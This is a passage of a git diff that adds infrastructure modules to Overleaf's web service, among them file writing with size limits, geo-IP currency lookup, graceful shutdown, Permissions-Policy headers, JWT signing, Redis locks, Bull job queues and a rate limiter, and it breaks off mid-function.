require('fs') +const OError = require('@overleaf/o-error') +const logger = require('@overleaf/logger') +const crypto = require('crypto') +const _ = require('lodash') +const Settings = require('@overleaf/settings') +const request = require('request') +const { Transform, pipeline } = require('stream') +const { FileTooLargeError } = require('../Features/Errors/Errors') +const { promisifyAll } = require('@overleaf/promise-utils') + +class SizeLimitedStream extends Transform { + constructor(options) { + options.autoDestroy = true + super(options) + + this.bytes = 0 + this.maxSizeBytes = options.maxSizeBytes || Settings.maxUploadSize + this.drain = false + this.on('error', () => { + this.drain = true + this.resume() + }) + } + + _transform(chunk, encoding, done) { + if (this.drain) { + // mechanism to drain the source stream on error, to avoid leaks + // we consume the rest of the incoming stream and don't push it anywhere + return done() + } + + this.bytes += chunk.length + if (this.maxSizeBytes && this.bytes > this.maxSizeBytes) { + return done( + new FileTooLargeError({ + message: 'stream size limit reached', + info: { size: this.bytes }, + }) + ) + } + this.push(chunk) + done() + } +} + +const FileWriter = { + ensureDumpFolderExists() { + fs.mkdirSync(Settings.path.dumpFolder, { recursive: true }) + }, + + writeLinesToDisk(identifier, lines, callback) { + if (callback == null) { + callback = function () {} + } + return FileWriter.writeContentToDisk(identifier, lines.join('\n'), callback) + }, + + writeContentToDisk(identifier, content, callback) { + if (callback == null) { + callback = function () {} + } + const fsPath = `${ + Settings.path.dumpFolder + }/${identifier}_${crypto.randomUUID()}` + return fs.writeFile(fsPath, content, function (error) { + if (error != null) { + return callback(error) + } + return callback(null, fsPath) + }) + }, + + writeStreamToDisk(identifier, stream, options, callback) { + if (typeof options === 'function') { + callback = options + options = {} + } + if (callback == null) { + callback = function () {} + } + options = options || {} + + const fsPath = `${ + Settings.path.dumpFolder + }/${identifier}_${crypto.randomUUID()}` + + const writeStream = fs.createWriteStream(fsPath) + const passThrough = new SizeLimitedStream({ + maxSizeBytes: options.maxSizeBytes, + }) + + // if writing fails, we want to consume the bytes from the source, to avoid leaks + for (const evt of ['error', 'close']) { + writeStream.on(evt, function () { + passThrough.unpipe(writeStream) + passThrough.resume() + }) + } + + pipeline(stream, passThrough, writeStream, function (err) { + if ( + options.maxSizeBytes && + passThrough.bytes >= options.maxSizeBytes && + !(err instanceof FileTooLargeError) + ) { + err = new FileTooLargeError({ + message: 'stream size limit reached', + info: { size: passThrough.bytes }, + }).withCause(err || {}) + } + if (err) { + OError.tag( + err, + '[writeStreamToDisk] something went wrong writing the stream to disk', + { + identifier, + fsPath, + } + ) + return callback(err) + } + + logger.debug( + { identifier, fsPath }, + '[writeStreamToDisk] write stream finished' + ) + callback(null, fsPath) + }) + }, + + writeUrlToDisk(identifier, url, options, callback) { + if (typeof options === 'function') { + callback = options + options = {} + } + if (callback == null) { + callback = function () {} + } + options = options || {} + callback = _.once(callback) + + const stream = request.get(url) + stream.on('error', function (err) { + logger.warn( + { err, identifier, url }, + '[writeUrlToDisk] something went wrong with writing to disk' + ) + callback(err) + }) + stream.on('response', function (response) { + if (response.statusCode >= 200 && response.statusCode < 300) { + FileWriter.writeStreamToDisk(identifier, stream, options, callback) + } else { + const err = new Error(`bad response from url: ${response.statusCode}`) + logger.warn({ err, identifier, url }, `[writeUrlToDisk] ${err.message}`) + return callback(err) + } + }) + }, +} + +module.exports = FileWriter +module.exports.promises = promisifyAll(FileWriter, { + without: ['ensureDumpFolderExists'], +}) +module.exports.SizeLimitedStream = SizeLimitedStream diff --git a/services/web/app/src/infrastructure/GeoIpLookup.js b/services/web/app/src/infrastructure/GeoIpLookup.js new file mode 100644 index 0000000..1f71e2a --- /dev/null +++ b/services/web/app/src/infrastructure/GeoIpLookup.js @@ -0,0 +1,127 @@ +const request = require('request') +const settings = require('@overleaf/settings') +const _ = require('lodash') +const logger = require('@overleaf/logger') +const { URL } = require('url') +const { promisify, promisifyMultiResult } = require('@overleaf/promise-utils') + +const DEFAULT_CURRENCY_CODE = 'USD' + +const currencyMappings = { + GB: 'GBP', + US: 'USD', + CH: 'CHF', + NZ: 'NZD', + AU: 'AUD', + DK: 'DKK', + NO: 'NOK', + CA: 'CAD', + SE: 'SEK', + SG: 'SGD', + IN: 'INR', + BR: 'BRL', + MX: 'MXN', + CO: 'COP', + CL: 'CLP', + PE: 'PEN', +} + +const validCurrencyParams = Object.values(currencyMappings).concat([ + 'EUR', + 'INR', + 'BRL', + 'MXN', + 'COP', + 'CLP', + 'PEN', +]) + +// Countries which would likely prefer Euro's +const EuroCountries = [ + 'AT', + 'BE', + 'BG', + 'HR', + 'CY', + 'CZ', + 'EE', + 'FI', + 'FR', + 'DE', + 'EL', + 'HU', + 'IE', + 'IT', + 'LV', + 'LT', + 'LU', + 'MT', + 'NL', + 'PL', + 'PT', + 'RO', + 'SK', + 'SI', + 'ES', +] + +_.forEach(EuroCountries, country => (currencyMappings[country] = 'EUR')) + +function isValidCurrencyParam(currency) { + if (!currency) { + return false + } + return validCurrencyParams.includes(currency) +} + +function getDetails(ip, callback) { + if (!ip) { + return callback(new Error('no ip passed')) + } + ip = ip.trim().split(' ')[0] + const opts = { + url: new URL(ip, settings.apis.geoIpLookup.url).href, + timeout: 1000, + json: true, + } + logger.debug({ ip, opts }, 'getting geo ip details') + request.get(opts, function (err, res, ipDetails) { + if (err) { + logger.warn({ err, ip }, 'error getting ip details') + } + callback(err, ipDetails) + }) +} + +function getCurrencyCode(ip, callback) { + getDetails(ip, function (err, ipDetails) { + if (err || !ipDetails) { + logger.err( + { err, ip }, + `problem getting currencyCode for ip, defaulting to ${DEFAULT_CURRENCY_CODE}` + ) + return callback(null, DEFAULT_CURRENCY_CODE) + } + const countryCode = + ipDetails && ipDetails.country_code + ? ipDetails.country_code.toUpperCase() + : undefined + const currencyCode = currencyMappings[countryCode] || DEFAULT_CURRENCY_CODE + logger.debug({ ip, currencyCode, ipDetails }, 'got currencyCode for ip') + callback(err, currencyCode, countryCode) + }) +} + +module.exports = { + getDetails, + getCurrencyCode, + isValidCurrencyParam, + promises: { + getDetails: promisify(getDetails), + getCurrencyCode: promisifyMultiResult(getCurrencyCode, [ + 'currencyCode', + 'countryCode', + ]), + }, + DEFAULT_CURRENCY_CODE, +} diff --git a/services/web/app/src/infrastructure/GracefulShutdown.js b/services/web/app/src/infrastructure/GracefulShutdown.js new file mode 100644 index 0000000..2446397 --- /dev/null +++ b/services/web/app/src/infrastructure/GracefulShutdown.js @@ -0,0 +1,150 @@ +/* + Graceful shutdown sequence: + - Stop background tasks that depend on the DB, like redis queues + - Stop processing new HTTP requests + - Wait for background tasks that depend on the DB, like polling that was + triggered by HTTP requests + - Drain/Close db connections + - Cleanup other background tasks, like metrics collectors + - By now the node app should exit on its own. + */ + +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const Settings = require('@overleaf/settings') +const Metrics = require('@overleaf/metrics') +const sleep = require('util').promisify(setTimeout) +const optionalCleanupHandlersBeforeStoppingTraffic = [] +const requiredCleanupHandlersBeforeDrainingConnections = [] +const optionalCleanupHandlersAfterDrainingConnections = [] +const connectionDrainer = [] + +function addConnectionDrainer(label, handler) { + connectionDrainer.push({ label, handler }) +} + +function addOptionalCleanupHandlerBeforeStoppingTraffic(label, handler) { + optionalCleanupHandlersBeforeStoppingTraffic.push({ label, handler }) +} + +function addRequiredCleanupHandlerBeforeDrainingConnections(label, handler) { + requiredCleanupHandlersBeforeDrainingConnections.push({ label, handler }) +} + +function addOptionalCleanupHandlerAfterDrainingConnections(label, handler) { + optionalCleanupHandlersAfterDrainingConnections.push({ label, handler }) +} + +async function runHandlers(stage, handlers, logOnly) { + logger.info({ stage }, 'graceful shutdown: run handlers') + for (const { label, handler } of handlers) { + try { + await handler() + } catch (e) { + const err = OError.tag(e, 'handler failed', { stage, label }) + if (logOnly) { + logger.err({ err }, 'graceful shutdown: incomplete cleanup') + } else { + throw err + } + } + } +} + +/** + * @param {import('net').Server} server + * @param {string} signal + */ +async function gracefulShutdown(server, signal) { + logger.warn({ signal }, 'graceful shutdown: started shutdown sequence') + Settings.shuttingDown = true + + await runHandlers( + 'optionalBeforeStoppingTraffic', + optionalCleanupHandlersBeforeStoppingTraffic, + true + ) + + await sleep(Settings.gracefulShutdownDelayInMs) + try { + await new Promise((resolve, reject) => { + logger.warn({}, 'graceful shutdown: closing http server') + server.close(err => { + if (err) { + reject(OError.tag(err, 'http.Server.close failed')) + } else { + resolve() + } + }) + }) + } catch (err) { + throw OError.tag(err, 'stop traffic') + } + + await runHandlers( + 'requiredBeforeDrainingConnections', + requiredCleanupHandlersBeforeDrainingConnections + ) + + try { + await runHandlers('connectionDrainer', connectionDrainer) + + await runHandlers( + 'optionalAfterDrainingConnections', + optionalCleanupHandlersAfterDrainingConnections.concat([ + { label: 'metrics module', handler: () => Metrics.close() }, + ]) + ) + } catch (err) { + logger.err( + { err }, + 'graceful shutdown: failed after stopping traffic, exiting' + ) + // wait for logs to flush + await sleep(1000) + process.exit(1) + return + } + logger.info({}, 'graceful shutdown: ready to exit') +} + +function triggerGracefulShutdown(server, signal) { + gracefulShutdown(server, signal).catch(err => { + logger.err( + { err }, + 'graceful shutdown: incomplete cleanup, waiting for kill' + ) + }) +} + +class BackgroundTaskTracker { + constructor(label) { + // Do not leak any handles, just record the number of pending jobs. + // In case we miss the cleanup of one job, the worst thing that can happen + // is that we do not stop web "gracefully" before k8s kills it forcefully. + this.pendingBackgroundTasks = 0 + addRequiredCleanupHandlerBeforeDrainingConnections(label, async () => { + while (this.pendingBackgroundTasks > 0) { + await sleep(100) // try again in 100ms. + } + }) + } + + add() { + this.pendingBackgroundTasks++ + } + + done() { + this.pendingBackgroundTasks-- + } +} + +module.exports = { + BackgroundTaskTracker, + addConnectionDrainer, + addOptionalCleanupHandlerBeforeStoppingTraffic, + addOptionalCleanupHandlerAfterDrainingConnections, + addRequiredCleanupHandlerBeforeDrainingConnections, + triggerGracefulShutdown, + gracefulShutdown, +} diff --git a/services/web/app/src/infrastructure/HttpPermissionsPolicy.js b/services/web/app/src/infrastructure/HttpPermissionsPolicy.js new file mode 100644 index 0000000..2c81ddb --- /dev/null +++ b/services/web/app/src/infrastructure/HttpPermissionsPolicy.js @@ -0,0 +1,88 @@ +// @ts-check + +const Settings = require('@overleaf/settings') + +/** + * @import { HttpPermissionsPolicy } from './types' + */ + +class HttpPermissionsPolicyMiddleware { + /** + * Initialise the middleware with a Permissions Policy config + * @param {HttpPermissionsPolicy} policy + */ + constructor(policy) { + this.middleware = this.middleware.bind(this) + if (policy) { + this.policy = this.buildPermissionsPolicy(policy) + } + } + + /** + * Checks the provided policy is valid + * @param {HttpPermissionsPolicy} policy + * @returns {boolean} + */ + validatePermissionsPolicy(policy) { + let policyIsValid = true + + if (!policy.allowed) { + return true + } + + for (const [directive, origins] of Object.entries(policy.allowed)) { + // Do any directives in the allowlist clash with the denylist? + if (policy.blocked && policy.blocked.includes(directive)) { + policyIsValid = false + } + if (!origins) { + policyIsValid = false + } + } + + return policyIsValid + } + + /** + * Constructs a Permissions-Policy header string from the given policy configuration + * @param {HttpPermissionsPolicy} policy + * @returns {string} + */ + buildPermissionsPolicy(policy) { + if (!this.validatePermissionsPolicy(policy)) { + throw new Error('Invalid Permissions-Policy header configuration') + } + + const policyElements = [] + + if (policy.blocked && policy.blocked.length > 0) { + policyElements.push( + policy.blocked.map(policyElement => `${policyElement}=()`).join(', ') + ) + } + + if (policy.allowed && Object.entries(policy.allowed).length > 0) { + policyElements.push( + Object.keys(policy.allowed) + .map(allowKey => `${allowKey}=(${policy.allowed[allowKey]})`) + .join(', ') + ) + } + + return policyElements.join(', ') + } + + middleware(req, res, next) { + if (this.policy && Settings.useHttpPermissionsPolicy) { + const originalRender = res.render + + res.render = (...args) => { + res.setHeader('Permissions-Policy', this.policy) + originalRender.apply(res, args) + } + } + next() + } +} + +module.exports = HttpPermissionsPolicyMiddleware diff --git a/services/web/app/src/infrastructure/JsonWebToken.js b/services/web/app/src/infrastructure/JsonWebToken.js new file mode 100644 index 0000000..0a49e97 --- /dev/null +++ b/services/web/app/src/infrastructure/JsonWebToken.js @@ -0,0 +1,22 @@ +const { callbackify, promisify } = require('util') +const JWT = require('jsonwebtoken') +const Settings = require('@overleaf/settings') + +const jwtSign = promisify(JWT.sign) + +async function sign(payload, options = {}) { + const key = Settings.jwt.key + const algorithm = Settings.jwt.algorithm + if (!key || !algorithm) { + throw new Error('missing JWT configuration') + } + const token = await jwtSign(payload, key, { ...options, algorithm }) + return token +} + +module.exports = { + sign: callbackify(sign), + promises: { + sign, + }, +} diff --git a/services/web/app/src/infrastructure/Keys.js b/services/web/app/src/infrastructure/Keys.js new file mode 100644 index 0000000..cd177b9 --- /dev/null +++ b/services/web/app/src/infrastructure/Keys.js @@ -0,0 +1,8 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +module.exports = { + queue: { + web_to_tpds_http_requests: 'web_to_tpds_http_requests', + tpds_to_web_http_requests: 'tpds_to_web_http_requests', + }, +} diff --git a/services/web/app/src/infrastructure/LockManager.js b/services/web/app/src/infrastructure/LockManager.js new file mode 100644 index 0000000..8c21409 --- /dev/null +++ b/services/web/app/src/infrastructure/LockManager.js @@ -0,0 +1,36 @@ +const settings = require('@overleaf/settings') +const RedisWrapper = require('./RedisWrapper') +const rclient = RedisWrapper.client('lock') + +const RedisWebLocker = require('@overleaf/redis-wrapper/RedisWebLocker') + +// this method creates a lock manager with the provided timeout options +function createLockManager(options) { + return new RedisWebLocker({ + rclient, + getKey(namespace, id) { + return `lock:web:${namespace}:${id}` + }, + options, + }) +} + +// this is the default lock manager for web +const LockManager = createLockManager(settings.lockManager) + +// this method creates a lock manager with a configurable timeout +// it shares the lock keys with the default lock manager +LockManager.withTimeout = function (timeout) { + const overrides = { + redisLockExpiry: timeout, // in seconds + slowExecutionThreshold: 0.5 * timeout * 1000, // in ms + } + const lockManagerSettingsWithTimeout = Object.assign( + {}, + settings.lockManager, + overrides + ) + return createLockManager(lockManagerSettingsWithTimeout) +} + +module.exports = LockManager diff --git a/services/web/app/src/infrastructure/LoggerSerializers.js b/services/web/app/src/infrastructure/LoggerSerializers.js new file mode 100644 index 0000000..09d274a --- /dev/null +++ b/services/web/app/src/infrastructure/LoggerSerializers.js @@ -0,0 +1,57 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +module.exports = { + user(user) { + if (user == null) { + return null + } + if (user._id == null) { + user = { _id: user } + } + return { + id: user._id, + email: user.email, + first_name: user.name, + last_name: user.name, + } + }, + + project(project) { + if (project == null) { + return null + } + if (project._id == null) { + project = { _id: project } + } + return { + id: project._id, + name: project.name, + } + }, + + docs(docs) { + if ((docs != null ? docs.map : undefined) == null) { + return + } + return docs.map(doc => ({ + path: doc.path, + id: doc.doc, + })) + }, + + files(files) { + if ((files != null ? files.map : undefined) == null) { + return + } + return files.map(file => ({ + path: file.path, + id: file.file, + })) + }, +} diff --git a/services/web/app/src/infrastructure/Metrics.js b/services/web/app/src/infrastructure/Metrics.js new file mode 100644 index 0000000..2185c3c --- /dev/null +++ b/services/web/app/src/infrastructure/Metrics.js @@ -0,0 +1,7 @@ +const Metrics = require('@overleaf/metrics') + +exports.analyticsQueue = new Metrics.prom.Counter({ + name: 'analytics_queue', + help: 'Number of events sent to the analytics queue', + labelNames: ['status', 'event_type'], +}) diff --git a/services/web/app/src/infrastructure/Modules.js b/services/web/app/src/infrastructure/Modules.js new file mode 100644 index 0000000..a21be43 --- /dev/null +++ b/services/web/app/src/infrastructure/Modules.js @@ -0,0 +1,222 @@ +const fs = require('fs') +const Path = require('path') +const { promisify, callbackify } = require('util') +const Settings = require('@overleaf/settings') +const Views = require('./Views') +const _ = require('lodash') + +const MODULE_BASE_PATH = Path.join(__dirname, '/../../../modules') + +const _modules = [] +let _modulesLoaded = false +const _hooks = {} +const _middleware = {} +let _viewIncludes = {} + +async function modules() { + if (!_modulesLoaded) { + await loadModules() + } + return _modules +} + +async function loadModulesImpl() { + const settingsCheckModuleCjs = Path.join( + MODULE_BASE_PATH, + 'settings-check', + 'index.js' + ) + const settingsCheckModuleEsm = Path.join( + MODULE_BASE_PATH, + 'settings-check', + 'index.mjs' + ) + if (fs.existsSync(settingsCheckModuleCjs)) { + await import(settingsCheckModuleCjs) + } else if (fs.existsSync(settingsCheckModuleEsm)) { + await import(settingsCheckModuleEsm) + } + for (const moduleName of Settings.moduleImportSequence || []) { + let path + if (fs.existsSync(Path.join(MODULE_BASE_PATH, moduleName, 'index.mjs'))) { + path = Path.join(MODULE_BASE_PATH, moduleName, 'index.mjs') + } else { + path = Path.join(MODULE_BASE_PATH, moduleName, 'index.js') + } + const module = await import(path) + const loadedModule = module.default || module + + loadedModule.name = moduleName + _modules.push(loadedModule) + if (loadedModule.viewIncludes) { + throw new Error( + `${moduleName}: module.viewIncludes moved into Settings.viewIncludes` + ) + } + if (loadedModule.dependencies) { + for (const dependency of loadedModule.dependencies) { + if (!Settings.moduleImportSequence.includes(dependency)) { + throw new Error( + `Module '${dependency}' listed as a dependency of '${moduleName}' is missing in the moduleImportSequence. Please also verify that it is available in the current environment.` + ) + } + } + } + } + _modulesLoaded = true + await attachHooks() + await attachMiddleware() +} + +const loadModules = _.memoize(loadModulesImpl) + +async function applyRouter(webRouter, privateApiRouter, publicApiRouter) { + for (const module of await modules()) { + if (module.router && module.router.apply) { + await module.router.apply(webRouter, privateApiRouter, publicApiRouter) + } + } +} + +async function applyNonCsrfRouter( + webRouter, + privateApiRouter, + publicApiRouter +) { + for (const module of await modules()) { + if (module.nonCsrfRouter != null) { + module.nonCsrfRouter.apply(webRouter, privateApiRouter, publicApiRouter) + } + if (module.router && module.router.applyNonCsrfRouter) { + module.router.applyNonCsrfRouter( + webRouter, + privateApiRouter, + publicApiRouter + ) + } + } +} + +async function start() { + for (const module of await modules()) { + await module.start?.() + } +} + +function loadViewIncludes(app) { + _viewIncludes = Views.compileViewIncludes(app) +} + +async function applyMiddleware(appOrRouter, middlewareName, options) { + if (!middlewareName) { + throw new Error( + 'middleware name must be provided to register module middleware' + ) + } + for (const module of await modules()) { + if (module[middlewareName]) { + module[middlewareName](appOrRouter, options) + } + } +} + +function moduleIncludes(view, locals) { + const compiledPartials = _viewIncludes[view] || [] + let html = '' + for (const compiledPartial of compiledPartials) { + html += compiledPartial(locals) + } + return html +} + +function moduleIncludesAvailable(view) { + return (_viewIncludes[view] || []).length > 0 +} + +async function linkedFileAgentsIncludes() { + const agents = {} + for (const module of await modules()) { + for (const name in module.linkedFileAgents) { + const agentFunction = module.linkedFileAgents[name] + agents[name] = agentFunction() + } + } + return agents +} + +async function attachHooks() { + for (const module of await modules()) { + const { promises, ...hooks } = module.hooks || {} + for (const hook in promises || {}) { + const method = promises[hook] + attachHook(hook, method) + } + for (const hook in hooks || {}) { + const method = hooks[hook] + attachHook(hook, promisify(method)) + } + } +} + +function attachHook(name, method) { + if (_hooks[name] == null) { + _hooks[name] = [] + } + _hooks[name].push(method) +} + +async function attachMiddleware() { + for (const module of await modules()) { + for (const middleware in module.middleware || {}) { + const method = module.middleware[middleware] + if (_middleware[middleware] == null) { + _middleware[middleware] = [] + } + _middleware[middleware].push(method) + } + } +} + +async function fireHook(name, ...args) { + // ensure that modules are loaded if we need to fire a hook + // this can happen if a script calls a method that fires a hook + if (!_modulesLoaded) { + await loadModules() + } + const methods = _hooks[name] || [] + const results = [] + for (const method of methods) { + const result = await method(...args) + results.push(result) + } + return results +} + +async function getMiddleware(name) { + // ensure that modules are loaded if we need to call a middleware + if (!_modulesLoaded) { + await loadModules() + } + return _middleware[name] || [] +} + +module.exports = { + applyNonCsrfRouter, + applyRouter, + linkedFileAgentsIncludes, + loadViewIncludes, + moduleIncludes, + moduleIncludesAvailable, + applyMiddleware, + start, + hooks: { + attach: attachHook, + fire: callbackify(fireHook), + }, + middleware: getMiddleware, + promises: { + hooks: { + fire: fireHook, + }, + }, +} diff --git a/services/web/app/src/infrastructure/Mongoose.js b/services/web/app/src/infrastructure/Mongoose.js new file mode 100644 index 0000000..a867757 --- /dev/null +++ b/services/web/app/src/infrastructure/Mongoose.js @@ -0,0 +1,57 @@ +const mongoose = require('mongoose') +const Settings = require('@overleaf/settings') +const Metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const { addConnectionDrainer } = require('./GracefulShutdown') + +mongoose.set('autoIndex', false) +mongoose.set('strictQuery', false) + +const connectionPromise = mongoose.connect( + Settings.mongo.url, + Settings.mongo.options +) + +connectionPromise + .then(mongooseInstance => { + Metrics.mongodb.monitor(mongooseInstance.connection.client) + }) + .catch(error => { + logger.error( + { error }, + 'Failed to connect to MongoDB - cannot set up monitoring' + ) + }) + +addConnectionDrainer('mongoose', async () => { + await connectionPromise + await mongoose.disconnect() +}) + +mongoose.connection.on('connected', () => + logger.debug('mongoose default connection open') +) + +mongoose.connection.on('error', err => + logger.err({ err }, 'mongoose error on default connection') +) + +mongoose.connection.on('disconnected', () => + logger.debug('mongoose default connection disconnected') +) + +if (process.env.MONGOOSE_DEBUG) { + mongoose.set('debug', (collectionName, method, query, doc) => + logger.debug({ collectionName, method, query, doc }, 'mongoose debug') + ) +} + +mongoose.plugin(schema => { + schema.options.usePushEach = true +}) + +mongoose.Promise = global.Promise + +mongoose.connectionPromise = connectionPromise + +module.exports = mongoose diff --git a/services/web/app/src/infrastructure/PackageVersions.js b/services/web/app/src/infrastructure/PackageVersions.js new file mode 100644 index 0000000..f2e22fc --- /dev/null +++ b/services/web/app/src/infrastructure/PackageVersions.js @@ -0,0 +1,16 @@ +const version = { + mathjax: '3.2.2', + dictionaries: '0.0.3', +} + +module.exports = { + version, + + lib(name) { + if (version[name] != null) { + return `${name}-${version[name]}` + } else { + return `${name}` + } + }, +} diff --git a/services/web/app/src/infrastructure/QueueWorkers.js b/services/web/app/src/infrastructure/QueueWorkers.js new file mode 100644 index 0000000..0b11795 --- /dev/null +++ b/services/web/app/src/infrastructure/QueueWorkers.js @@ -0,0 +1,110 @@ +const Features = require('./Features') +const Queues = require('./Queues') +const UserOnboardingEmailManager = require('../Features/User/UserOnboardingEmailManager') +const UserPostRegistrationAnalyticsManager = require('../Features/User/UserPostRegistrationAnalyticsManager') +const FeaturesUpdater = require('../Features/Subscription/FeaturesUpdater') +const { + addOptionalCleanupHandlerBeforeStoppingTraffic, + addRequiredCleanupHandlerBeforeDrainingConnections, +} = require('./GracefulShutdown') +const EmailHandler = require('../Features/Email/EmailHandler') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const Modules = require('./Modules') + +/** + * @typedef {{ + * data: {queueName: string,name?: string,data?: any}, + * }} BullJob + */ + +/** + * @param {string} queueName + * @param {(job: BullJob) => Promise<void>} handler + */ +function registerQueue(queueName, handler) { + if (process.env.QUEUE_PROCESSING_ENABLED === 'true') { + const queue = Queues.getQueue(queueName) + queue.process(handler) + registerCleanup(queue) + } +} + +function start() { + if (!Features.hasFeature('saas')) { + return + } + + registerQueue('scheduled-jobs', async job => { + const { queueName, name, data, options } = job.data + const queue = Queues.getQueue(queueName) + if (name) { + await queue.add(name, data || {}, options || {}) + } else { + await queue.add(data || {}, options || {}) + } + }) + + registerQueue('emails-onboarding', async job => { + const { userId } = job.data + await UserOnboardingEmailManager.sendOnboardingEmail(userId) + }) + + registerQueue('post-registration-analytics', async job => { + const { userId } = job.data + await UserPostRegistrationAnalyticsManager.postRegistrationAnalytics(userId) + }) + + registerQueue('refresh-features', async job => { + const { userId, reason } = job.data + await FeaturesUpdater.promises.refreshFeatures(userId, reason) + }) + + registerQueue('deferred-emails', async job => { + const { emailType, opts } = job.data + try { + await EmailHandler.promises.sendEmail(emailType, opts) + } catch (e) { + const error = OError.tag(e, 'failed to send deferred email') + logger.warn({ error, emailType }, error.message) + throw error + } + }) + + registerQueue('group-sso-reminder', async job => { + const { userId, subscriptionId } = job.data + try { + await Modules.promises.hooks.fire( + 'sendGroupSSOReminder', + userId, + subscriptionId + ) + } catch (e) { + const error = OError.tag( + e, + 'failed to send scheduled Group SSO account linking reminder' + ) + logger.warn({ error, userId, subscriptionId }, error.message) + throw error + } + }) +} + +function registerCleanup(queue) { + const label = `bull queue ${queue.name}` + + // Stop accepting new jobs. + addOptionalCleanupHandlerBeforeStoppingTraffic(label, async () => { + const justThisWorker = true + await queue.pause(justThisWorker) + }) + + // Wait for all jobs to process before shutting down connections. + addRequiredCleanupHandlerBeforeDrainingConnections(label, async () => { + await queue.close() + }) + + // Disconnect from redis is scheduled in queue setup. +} + +module.exports = { start, registerQueue } diff --git a/services/web/app/src/infrastructure/Queues.js b/services/web/app/src/infrastructure/Queues.js new file mode 100644 index 0000000..3784215 --- /dev/null +++ b/services/web/app/src/infrastructure/Queues.js @@ -0,0 +1,121 @@ +const Queue = require('bull') +const Settings = require('@overleaf/settings') +const Features = require('../infrastructure/Features') +const { addConnectionDrainer } = require('./GracefulShutdown') + +// Bull will keep a fixed number of the most recently completed jobs. This is +// useful to inspect recently completed jobs. The bull prometheus exporter also +// uses the completed job records to report on job duration. +const MAX_COMPLETED_JOBS_RETAINED = 10000 +const MAX_FAILED_JOBS_RETAINED = 50000 +const MAX_FAILED_JOBS_RETAINED_ANALYTICS = 3000000 + +const QUEUES_JOB_OPTIONS = { + 'analytics-events': { + removeOnFail: MAX_FAILED_JOBS_RETAINED_ANALYTICS, + }, + 'analytics-editing-sessions': { + removeOnFail: MAX_FAILED_JOBS_RETAINED_ANALYTICS, + }, + 'analytics-account-mapping': { + removeOnFail: MAX_FAILED_JOBS_RETAINED_ANALYTICS, + }, + 'analytics-user-properties': { + removeOnFail: MAX_FAILED_JOBS_RETAINED_ANALYTICS, + }, + 'refresh-features': { + removeOnFail: MAX_FAILED_JOBS_RETAINED, + attempts: 3, + }, + 'emails-onboarding': { + removeOnFail: MAX_FAILED_JOBS_RETAINED, + }, + 'post-registration-analytics': { + removeOnFail: MAX_FAILED_JOBS_RETAINED_ANALYTICS, + }, + 'scheduled-jobs': { + removeOnFail: MAX_FAILED_JOBS_RETAINED, + attempts: 1, + }, + 'confirm-institution-domain': { + removeOnFail: MAX_FAILED_JOBS_RETAINED, + attempts: 3, + }, + + 'group-sso-reminder': { + removeOnFail: MAX_FAILED_JOBS_RETAINED, + attempts: 3, + }, +} + +const QUEUE_OPTIONS = { + 'confirm-institution-domain': { + limiter: { + max: 1, + duration: 60 * 1000, + }, + }, +} + +const ANALYTICS_QUEUES = [ + 'analytics-account-mapping', + 'analytics-events', + 'analytics-editing-sessions', + 'analytics-user-properties', + 'post-registration-analytics', +] + +const queues = {} + +function getQueue(queueName) { + if (!Features.hasFeature('saas')) { + // Disable bull queue handling for Server Pro/CE by providing a stub interface. + return { + async add() {}, + process() {}, + } + } + + if (!queues[queueName]) { + const redisOptions = ANALYTICS_QUEUES.includes(queueName) + ? Settings.redis.analyticsQueues + : Settings.redis.queues + const queueOptions = QUEUE_OPTIONS[queueName] || {} + const jobOptions = QUEUES_JOB_OPTIONS[queueName] || {} + queues[queueName] = new Queue(queueName, { + // this configuration is duplicated in /services/analytics/app/js/Queues.js + // and needs to be manually kept in sync whenever modified + redis: redisOptions, + ...queueOptions, + defaultJobOptions: { + removeOnComplete: MAX_COMPLETED_JOBS_RETAINED, + attempts: 11, + backoff: { + type: 'exponential', + delay: 3000, + }, + ...jobOptions, + }, + }) + + // Disconnect from redis eventually. + addConnectionDrainer(`bull queue ${queueName}`, async () => { + await queues[queueName].disconnect() + }) + } + return queues[queueName] +} + +async function createScheduledJob(queueName, { name, data, options }, delay) { + await getQueue('scheduled-jobs').add( + { queueName, name, data, options }, + { + delay, + } + ) +} + +module.exports = { + getQueue, + createScheduledJob, +} diff --git a/services/web/app/src/infrastructure/RateLimiter.js b/services/web/app/src/infrastructure/RateLimiter.js new file mode 100644 index 0000000..6ce80b2 --- /dev/null +++ b/services/web/app/src/infrastructure/RateLimiter.js @@ -0,0 +1,144 @@ +const Settings = require('@overleaf/settings') +const Metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const RedisWrapper = require('./RedisWrapper') +const RateLimiterFlexible = require('rate-limiter-flexible') +const OError = require('@overleaf/o-error') + +const rclient = RedisWrapper.client('ratelimiter') + +/** + * Wrapper over the RateLimiterRedis class + */ +class RateLimiter { + #opts + + /** + * Create a rate limiter. + * + * @param name {string} The name that identifies this rate limiter. Different + * rate limiters must have different names. + * @param opts {object} Options to pass to RateLimiterRedis + * + * Some useful options: + * + * points - number of points that can be consumed over the given duration + * (default: 4) + * subnetPoints - number of points that can be consumed over the given + * duration accross a sub-network. This should only be used + * ip-based rate limits. + * duration - duration of the fixed window in seconds (default: 1) + * blockDuration - additional seconds to block after all points are consumed + * (default: 0) + */ + constructor(name, opts = {}) { + this.name = name + this.#opts = Object.assign({}, opts) + this._rateLimiter = new RateLimiterFlexible.RateLimiterRedis({ + ...opts, + keyPrefix: `rate-limit:${name}`, + storeClient: rclient, + }) + if (opts.subnetPoints && !Settings.rateLimit?.subnetRateLimiterDisabled) { + this._subnetRateLimiter = new RateLimiterFlexible.RateLimiterRedis({ + ...opts, + points: opts.subnetPoints, + keyPrefix: `rate-limit:${name}`, + storeClient: rclient, + }) + } + } + + // Readonly access to the options, useful for aligning rate-limits. + getOptions() { + return Object.assign({}, this.#opts) + } + + async consume(key, points = 1, options = { method: 'unknown' }) { + if (Settings.disableRateLimits) { + // Return a fake result in case it's used somewhere + return { + msBeforeNext: 0, + remainingPoints: 100, + consumedPoints: 0, + isFirstInDuration: false, + } + } + + await this.consumeForRateLimiter(this._rateLimiter, key, options, points) + + if (options.method === 